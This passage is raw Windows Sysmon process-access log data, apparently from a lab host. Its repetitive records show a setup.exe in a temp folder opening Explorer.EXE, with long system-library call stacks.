torage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 